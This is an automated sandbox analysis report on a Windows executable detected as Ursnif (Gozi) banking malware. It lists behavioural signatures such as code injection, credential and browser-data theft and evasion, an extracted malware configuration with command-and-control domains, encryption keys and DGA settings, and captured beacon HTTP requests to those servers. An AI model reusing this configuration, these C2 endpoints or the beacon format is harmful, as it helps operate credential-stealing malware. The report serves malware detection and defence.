Windows Analysis Report anIV2qJeLD.exe

Overview

General Information

Sample Name: anIV2qJeLD.exe
Analysis ID: 527473
MD5: 20c0d2005c6a542fb9c20466775c6142
SHA1: aff311698bd06a0010c9be81dae43d9c37dd847d
SHA256: 4c50ff0945136ff0f79eb75ee7d5c86025282ab519488f692ffc267873160bb6
Tags: exeGoziISFB
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (overwrites its own PE header)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Found malware configuration
Sigma detected: Powershell run code from registry
Sigma detected: Encoded IEX
Tries to steal Mail credentials (via file / registry access)
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Compiles code for process injection (via .Net compiler)
Uses nslookup.exe to query domains
Writes or reads registry keys via WMI
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Modifies the prolog of user mode functions (user mode inline hooks)
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Modifies the import address table of user mode modules (user mode IAT hooks)
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Contains functionality to read the clipboard data
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000001.00000002.962162001.0000000002030000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"RSA Public Key": "dm+RfNkITE5FceWriGPYkZaFfoP/k2XQ2jeLd8rNgFw6gJ6fNWsHd0U6akxsQHth/SBWm4/eMI9Y1qgwNJteasgQsUC7Ht20y96mIxH1hvPh9uvLSH5z2CNo+fcP8K+V0yoOOQzDln/qE7mMJHLu+rmogHE7S6lb7FVy/7xxrRe3zMDt5K9bDwOreWw0blGE", "c2_domain": ["yahoo.com", "soderunovos.website", "qoderunovos.website", "https://soderunovos.website", "https://qoderunovos.website"], "botnet": "4482", "server": "12", "serpent_key": "10291029JSJUYNHG", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "dga_base_url": "constitution.org/usdeclar.txt", "dga_tld": "com ru org", "DGA_count": "10"}
Machine Learning detection for sample
Source: anIV2qJeLD.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 1.2.anIV2qJeLD.exe.2030e50.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 1.3.anIV2qJeLD.exe.3bf0000.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.anIV2qJeLD.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen7

Compliance:

barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Unpacked PE file: 1.2.anIV2qJeLD.exe.400000.0.unpack
Uses 32bit PE files
Source: anIV2qJeLD.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\anIV2qJeLD.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 98.137.11.163:443 -> 192.168.2.4:49780 version: TLS 1.2
Source: unknown HTTPS traffic detected: 87.248.100.216:443 -> 192.168.2.4:49781 version: TLS 1.2
Source: unknown HTTPS traffic detected: 89.44.9.140:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: unknown HTTPS traffic detected: 209.202.254.90:443 -> 192.168.2.4:49854 version: TLS 1.2
Source: unknown HTTPS traffic detected: 209.202.254.90:443 -> 192.168.2.4:49855 version: TLS 1.2
Source: unknown HTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.4:49857 version: TLS 1.2
Source: unknown HTTPS traffic detected: 212.82.100.140:443 -> 192.168.2.4:49858 version: TLS 1.2
Source: Binary string: 5.pdbw=j source: powershell.exe, 0000000D.00000003.874385564.00000168B230A000.00000004.00000001.sdmp
Source: Binary string: C:\rukemimac\nizejezoyoja-seyikanasocin69\hezosiwem\100\paseve.pdb source: anIV2qJeLD.exe
Source: Binary string: ntdll.pdb source: anIV2qJeLD.exe, 00000001.00000003.821704923.0000000005CC0000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\pqwen5zh\pqwen5zh.pdbXP source: powershell.exe, 0000000D.00000002.908777927.000001689D0FB000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: anIV2qJeLD.exe, 00000001.00000003.821704923.0000000005CC0000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\i3mkzvx5\i3mkzvx5.pdb source: powershell.exe, 0000000D.00000002.908777927.000001689D0FB000.00000004.00000001.sdmp
Source: Binary string: 5.pdb source: powershell.exe, 0000000D.00000003.874385564.00000168B230A000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\pqwen5zh\pqwen5zh.pdb source: powershell.exe, 0000000D.00000002.908707605.000001689D0BA000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\i3mkzvx5\i3mkzvx5.pdbXP source: powershell.exe, 0000000D.00000002.908832791.000001689D133000.00000004.00000001.sdmp
Source: Binary string: h.pdb source: powershell.exe, 0000000D.00000003.874385564.00000168B230A000.00000004.00000001.sdmp
Source: Binary string: ]C:\rukemimac\nizejezoyoja-seyikanasocin69\hezosiwem\100\paseve.pdbP+C source: anIV2qJeLD.exe
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_01FDCBE3 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 1_2_01FDCBE3
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_01FDE9AC lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 1_2_01FDE9AC
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_01FE999E lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 1_2_01FE999E
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_01FEA2FE lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 1_2_01FEA2FE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 40_2_00FEE9AC memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose, 40_2_00FEE9AC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 40_2_00FF999E FindFirstFileW,FindNextFileW,FindClose,FreeLibrary, 40_2_00FF999E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 40_2_00FFA2FE lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 40_2_00FFA2FE

Networking:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: lycos.com
Source: C:\Windows\explorer.exe Domain query: mail.yahoo.com
Source: C:\Windows\explorer.exe Domain query: login.yahoo.com
Source: C:\Windows\explorer.exe Domain query: www.lycos.com
Uses nslookup.exe to query domains
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
May check the online IP address of the machine
Source: C:\Windows\System32\nslookup.exe DNS query: name: myip.opendns.com
Source: C:\Windows\System32\nslookup.exe DNS query: name: myip.opendns.com
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 57f3642b4e37e28f5cbe3020c9331b4c
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /jdraw/nIBVSTLyPt3UY/F_2Fx2Hc/Bze1TT57OG4HBNl2UO4H2_2/F2x5eVeu_2/F0oEIMCthzpdl_2F0/g6yK5x4lAPBL/IfJhlJxCH88/kNEvL4B2xwbPkg/l6LFIMkoo7_2BSx2Zl9QD/sNqAlyxot9VgUnIt/tD2_2FQ67j1kKZ4/4sQxxRyc1y_2Bi_2BR/gsw9z5z81/v3w096aztXCXUnfe5Q/wc2.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: yahoo.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /jdraw/nIBVSTLyPt3UY/F_2Fx2Hc/Bze1TT57OG4HBNl2UO4H2_2/F2x5eVeu_2/F0oEIMCthzpdl_2F0/g6yK5x4lAPBL/IfJhlJxCH88/kNEvL4B2xwbPkg/l6LFIMkoo7_2BSx2Zl9QD/sNqAlyxot9VgUnIt/tD2_2FQ67j1kKZ4/4sQxxRyc1y_2Bi_2BR/gsw9z5z81/v3w096aztXCXUnfe5Q/wc2.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Connection: Keep-AliveCache-Control: no-cacheHost: www.yahoo.comCookie: B=0m9msshgpqh4o&b=3&s=91
Source: global traffic HTTP traffic detected: GET /jdraw/izNkSVzKAcmqBRr6xyW/6eSNtrmUMl5kl7H7bHpPPe/XgZq30OCLmJbN/38meyqW9/jS3Kn1JZp4TlGq5YgXpUl9C/Xa1SOjVmRG/sfAXrifyx5RMMj1rG/x2_2B6xVjnCu/FR4yio2EmeZ/DM6_2BUk4qTqT1/rz8mXurCnwQiTqH0u8uPF/_2Bjp7nf0rXmnB1i/Em2dqw_2Bys5D/8.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: soderunovos.websiteConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /jdraw/f6g_2FiF4/BVB_2BmxiIV1nw_2B4cK/CEW08ItbFLwHO8UQuXN/_2BLf2lFUFBrC4suobQbOB/0fGYw2vRMdeDd/GloxsNvw/PasUyB_2F_2BHKhCo7UgE3u/2gjzOvnViA/3VWPE0psH7LTVPa7Y/AQrrT0oMv35d/Jg57ryhE8om/OJw5Ee8c4mGK6J/l0QzZoUYoPnAbKMV1LRii/_2FzkrD.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: soderunovos.websiteConnection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=5fh0nsuv43u1vr3r3q99rkvoc6; lang=en
Source: global traffic HTTP traffic detected: GET /jdraw/F_2Fam6oH9/d5VYFYpsfuCm2K1vb/FQEZJonXTERW/XCyivBuN7WP/pkkBh6P8bwS7JA/_2BGKoxOOY8NFu9I7k4lJ/PQBFMF7GdwoWQQpH/fx_2BleSZS1DDTO/Af_2FwYYreElF2LILk/I1df5_2Fd/zVYWpMKEIfwVAwGc0tI5/Te_2FDbyN2KV7bbG5lt/D80197YRF38WxHFk/uqB4Yp.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: soderunovos.websiteConnection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=5fh0nsuv43u1vr3r3q99rkvoc6; lang=en
Source: global traffic HTTP traffic detected: GET /images/wlxv_2B04cU0qSkXox0E_/2FRdAxwSrR7n9stT/V9STsgmzjlsKRuR/k88cceXoSMHxI9JKEG/45kqlQZXT/Mr7Wdg8zb1vn2mq8jDkV/H2DAND_2FnqHHWcq_2F/IeOH5ot4pdOxgKfYyICZxT/XW_2BP6OR8IO0/piM1H1fK/GtYRoB7eZyHQH7fMmFYyQPb/2pz334xIn2/3AcOddbNlYuj8sfqQ/BUUXSG7Qtg9l/hS6txj_2B7F/ursUfMjLLv8Lhz/4MuP37xbl/oYbmyDVP4/a6.jpeg HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: lycos.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /images/wlxv_2B04cU0qSkXox0E_/2FRdAxwSrR7n9stT/V9STsgmzjlsKRuR/k88cceXoSMHxI9JKEG/45kqlQZXT/Mr7Wdg8zb1vn2mq8jDkV/H2DAND_2FnqHHWcq_2F/IeOH5ot4pdOxgKfYyICZxT/XW_2BP6OR8IO0/piM1H1fK/GtYRoB7eZyHQH7fMmFYyQPb/2pz334xIn2/3AcOddbNlYuj8sfqQ/BUUXSG7Qtg9l/hS6txj_2B7F/ursUfMjLLv8Lhz/4MuP37xbl/oYbmyDVP4/a6.jpeg HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.lycos.com
Source: global traffic HTTP traffic detected: GET /images/wlxv_2B04cU0qSkXox0E_/2FRdAxwSrR7n9stT/V9STsgmzjlsKRuR/k88cceXoSMHxI9JKEG/45kqlQZXT/Mr7Wdg8zb1vn2mq8jDkV/H2DAND_2FnqHHWcq_2F/IeOH5ot4pdOxgKfYyICZxT/XW_2BP6OR8IO0/piM1H1fK/GtYRoB7eZyHQH7fMmFYyQPb/2pz334xIn2/3AcOddbNlYuj8sfqQ/BUUXSG7Qtg9l/hS6txj_2B7F/ursUfMjLLv8Lhz/4MuP37xbl/oYbmyDVP4/a6.jpeg/ HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.lycos.com
Source: global traffic HTTP traffic detected: GET /images/_2BRLy1x/4wsN2dLN7SbtqKweyBCVQVy/ncNEkpC68M/pGX_2BOwGt0R9_2BF/gPvtyZ2zCuXU/MtW7n3eg_2B/cVfCNS_2BVDqYE/NcD6s_2FvRGdMXsqfE9ud/QnKqi6Gdk85wdC67/aXmIXPep1RKvSuC/dU0LoB35OeBogincV5/_2FxALfnm/Pttx7XLPfUVU3_2FKsJC/yP8zqBt1Q2czLtOvx6I/xwix1VQVzSylmtN4_2FaYq/KZRSXLzBBanwh/lTfsORlu/JAGztGerO6_2BOMh0JL/2.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: mail.yahoo.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /?.src=ym&pspid=159600001&activity=mail-direct&.lang=en-US&.intl=us&.done=https%3A%2F%2Fmail.yahoo.com%2Fd%2Fimages%2F_2BRLy1x%2F4wsN2dLN7SbtqKweyBCVQVy%2FncNEkpC68M%2FpGX_2BOwGt0R9_2BF%2FgPvtyZ2zCuXU%2FMtW7n3eg_2B%2FcVfCNS_2BVDqYE%2FNcD6s_2FvRGdMXsqfE9ud%2FQnKqi6Gdk85wdC67%2FaXmIXPep1RKvSuC%2FdU0LoB35OeBogincV5%2F_2FxALfnm%2FPttx7XLPfUVU3_2FKsJC%2FyP8zqBt1Q2czLtOvx6I%2Fxwix1VQVzSylmtN4_2FaYq%2FKZRSXLzBBanwh%2FlTfsORlu%2FJAGztGerO6_2BOMh0JL%2F2.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: login.yahoo.com
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: M247GB M247GB
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 87.248.118.23 87.248.118.23
Source: anIV2qJeLD.exe, 00000001.00000003.811532515.0000000005CA8000.00000004.00000040.sdmp, powershell.exe, 0000000D.00000003.822024782.00000168B2DDC000.00000004.00000040.sdmp, control.exe, 00000014.00000003.880882500.0000027A72C3C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000019.00000002.1206306739.0000027D4FA02000.00000004.00000001.sdmp, rundll32.exe, 0000001A.00000002.892663424.000002970CDCC000.00000004.00000040.sdmp, cmd.exe, 0000001B.00000002.989095678.00000228E75EC000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000001C.00000002.1205830765.000001B4FB402000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.1197409376.000001DA4C802000.00000004.00000001.sdmp, PING.EXE, 00000020.00000002.985827192.000001F4F175C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000021.00000002.1061702784.00000235C1E02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000023.00000002.1196630517.0000029866E02000.00000004.00000001.sdmp, cmd.exe, 00000028.00000003.1067142468.00000000036C8000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: anIV2qJeLD.exe, 00000001.00000003.811532515.0000000005CA8000.00000004.00000040.sdmp, powershell.exe, 0000000D.00000003.822024782.00000168B2DDC000.00000004.00000040.sdmp, control.exe, 00000014.00000003.880882500.0000027A72C3C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000019.00000002.1206306739.0000027D4FA02000.00000004.00000001.sdmp, rundll32.exe, 0000001A.00000002.892663424.000002970CDCC000.00000004.00000040.sdmp, cmd.exe, 0000001B.00000002.989095678.00000228E75EC000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000001C.00000002.1205830765.000001B4FB402000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.1197409376.000001DA4C802000.00000004.00000001.sdmp, PING.EXE, 00000020.00000002.985827192.000001F4F175C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000021.00000002.1061702784.00000235C1E02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000023.00000002.1196630517.0000029866E02000.00000004.00000001.sdmp, cmd.exe, 00000028.00000003.1067142468.00000000036C8000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: anIV2qJeLD.exe, 00000001.00000003.811532515.0000000005CA8000.00000004.00000040.sdmp, powershell.exe, 0000000D.00000003.822024782.00000168B2DDC000.00000004.00000040.sdmp, control.exe, 00000014.00000003.880882500.0000027A72C3C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000019.00000002.1206306739.0000027D4FA02000.00000004.00000001.sdmp, rundll32.exe, 0000001A.00000002.892663424.000002970CDCC000.00000004.00000040.sdmp, cmd.exe, 0000001B.00000002.989095678.00000228E75EC000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000001C.00000002.1205830765.000001B4FB402000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.1197409376.000001DA4C802000.00000004.00000001.sdmp, PING.EXE, 00000020.00000002.985827192.000001F4F175C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000021.00000002.1061702784.00000235C1E02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000023.00000002.1196630517.0000029866E02000.00000004.00000001.sdmp, cmd.exe, 00000028.00000003.1067142468.00000000036C8000.00000004.00000040.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: RuntimeBroker.exe, 0000001C.00000000.915483032.000001B4F86FD000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobe.cmg
Source: RuntimeBroker.exe, 0000001C.00000000.915483032.000001B4F86FD000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobe.co/xa
Source: RuntimeBroker.exe, 0000001C.00000000.915483032.000001B4F86FD000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobe.ux
Source: RuntimeBroker.exe, 0000001C.00000000.915483032.000001B4F86FD000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobp/
Source: RuntimeBroker.exe, 0000001C.00000000.915483032.000001B4F86FD000.00000004.00000001.sdmp String found in binary or memory: http://ns.micro/1
Source: powershell.exe, 0000000D.00000002.916257388.00000168A9F53000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000D.00000002.878999957.000001689A0FF000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000D.00000002.878324773.0000016899EF1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000D.00000002.878999957.000001689A0FF000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000D.00000002.916257388.00000168A9F53000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.916257388.00000168A9F53000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.916257388.00000168A9F53000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: anIV2qJeLD.exe, 00000001.00000003.708603588.00000000048B8000.00000004.00000040.sdmp String found in binary or memory: https://csp.yahoo.com/beacon/csp?src=ats&site=frontpage&region=US&lang=en-US&device=desktop&yrid=4np
Source: powershell.exe, 0000000D.00000002.878999957.000001689A0FF000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000D.00000002.916257388.00000168A9F53000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: anIV2qJeLD.exe, 00000001.00000003.708603588.00000000048B8000.00000004.00000040.sdmp String found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
Source: anIV2qJeLD.exe, 00000001.00000003.708603588.00000000048B8000.00000004.00000040.sdmp String found in binary or memory: https://qoderunovos.website
Source: anIV2qJeLD.exe, 00000001.00000003.708603588.00000000048B8000.00000004.00000040.sdmp String found in binary or memory: https://soderunovos.website
Source: anIV2qJeLD.exe, 00000001.00000003.708603588.00000000048B8000.00000004.00000040.sdmp String found in binary or memory: https://soderunovos.websitehttps://qoderunovos.website
Source: anIV2qJeLD.exe, 00000001.00000003.708603588.00000000048B8000.00000004.00000040.sdmp String found in binary or memory: https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fnIBVSTLyPt3UY%2fF_2Fx2H
Source: unknown DNS traffic detected: queries for: yahoo.com
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_03C55988 ResetEvent,ResetEvent,lstrcat,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError, 1_2_03C55988
Source: global traffic HTTP traffic detected: GET /jdraw/nIBVSTLyPt3UY/F_2Fx2Hc/Bze1TT57OG4HBNl2UO4H2_2/F2x5eVeu_2/F0oEIMCthzpdl_2F0/g6yK5x4lAPBL/IfJhlJxCH88/kNEvL4B2xwbPkg/l6LFIMkoo7_2BSx2Zl9QD/sNqAlyxot9VgUnIt/tD2_2FQ67j1kKZ4/4sQxxRyc1y_2Bi_2BR/gsw9z5z81/v3w096aztXCXUnfe5Q/wc2.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: yahoo.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /jdraw/nIBVSTLyPt3UY/F_2Fx2Hc/Bze1TT57OG4HBNl2UO4H2_2/F2x5eVeu_2/F0oEIMCthzpdl_2F0/g6yK5x4lAPBL/IfJhlJxCH88/kNEvL4B2xwbPkg/l6LFIMkoo7_2BSx2Zl9QD/sNqAlyxot9VgUnIt/tD2_2FQ67j1kKZ4/4sQxxRyc1y_2Bi_2BR/gsw9z5z81/v3w096aztXCXUnfe5Q/wc2.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Connection: Keep-AliveCache-Control: no-cacheHost: www.yahoo.comCookie: B=0m9msshgpqh4o&b=3&s=91
Source: global traffic HTTP traffic detected: GET /jdraw/izNkSVzKAcmqBRr6xyW/6eSNtrmUMl5kl7H7bHpPPe/XgZq30OCLmJbN/38meyqW9/jS3Kn1JZp4TlGq5YgXpUl9C/Xa1SOjVmRG/sfAXrifyx5RMMj1rG/x2_2B6xVjnCu/FR4yio2EmeZ/DM6_2BUk4qTqT1/rz8mXurCnwQiTqH0u8uPF/_2Bjp7nf0rXmnB1i/Em2dqw_2Bys5D/8.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: soderunovos.websiteConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /jdraw/f6g_2FiF4/BVB_2BmxiIV1nw_2B4cK/CEW08ItbFLwHO8UQuXN/_2BLf2lFUFBrC4suobQbOB/0fGYw2vRMdeDd/GloxsNvw/PasUyB_2F_2BHKhCo7UgE3u/2gjzOvnViA/3VWPE0psH7LTVPa7Y/AQrrT0oMv35d/Jg57ryhE8om/OJw5Ee8c4mGK6J/l0QzZoUYoPnAbKMV1LRii/_2FzkrD.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: soderunovos.websiteConnection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=5fh0nsuv43u1vr3r3q99rkvoc6; lang=en
Source: global traffic HTTP traffic detected: GET /jdraw/F_2Fam6oH9/d5VYFYpsfuCm2K1vb/FQEZJonXTERW/XCyivBuN7WP/pkkBh6P8bwS7JA/_2BGKoxOOY8NFu9I7k4lJ/PQBFMF7GdwoWQQpH/fx_2BleSZS1DDTO/Af_2FwYYreElF2LILk/I1df5_2Fd/zVYWpMKEIfwVAwGc0tI5/Te_2FDbyN2KV7bbG5lt/D80197YRF38WxHFk/uqB4Yp.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: soderunovos.websiteConnection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=5fh0nsuv43u1vr3r3q99rkvoc6; lang=en
Source: global traffic HTTP traffic detected: GET /images/wlxv_2B04cU0qSkXox0E_/2FRdAxwSrR7n9stT/V9STsgmzjlsKRuR/k88cceXoSMHxI9JKEG/45kqlQZXT/Mr7Wdg8zb1vn2mq8jDkV/H2DAND_2FnqHHWcq_2F/IeOH5ot4pdOxgKfYyICZxT/XW_2BP6OR8IO0/piM1H1fK/GtYRoB7eZyHQH7fMmFYyQPb/2pz334xIn2/3AcOddbNlYuj8sfqQ/BUUXSG7Qtg9l/hS6txj_2B7F/ursUfMjLLv8Lhz/4MuP37xbl/oYbmyDVP4/a6.jpeg HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: lycos.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /images/wlxv_2B04cU0qSkXox0E_/2FRdAxwSrR7n9stT/V9STsgmzjlsKRuR/k88cceXoSMHxI9JKEG/45kqlQZXT/Mr7Wdg8zb1vn2mq8jDkV/H2DAND_2FnqHHWcq_2F/IeOH5ot4pdOxgKfYyICZxT/XW_2BP6OR8IO0/piM1H1fK/GtYRoB7eZyHQH7fMmFYyQPb/2pz334xIn2/3AcOddbNlYuj8sfqQ/BUUXSG7Qtg9l/hS6txj_2B7F/ursUfMjLLv8Lhz/4MuP37xbl/oYbmyDVP4/a6.jpeg HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.lycos.com
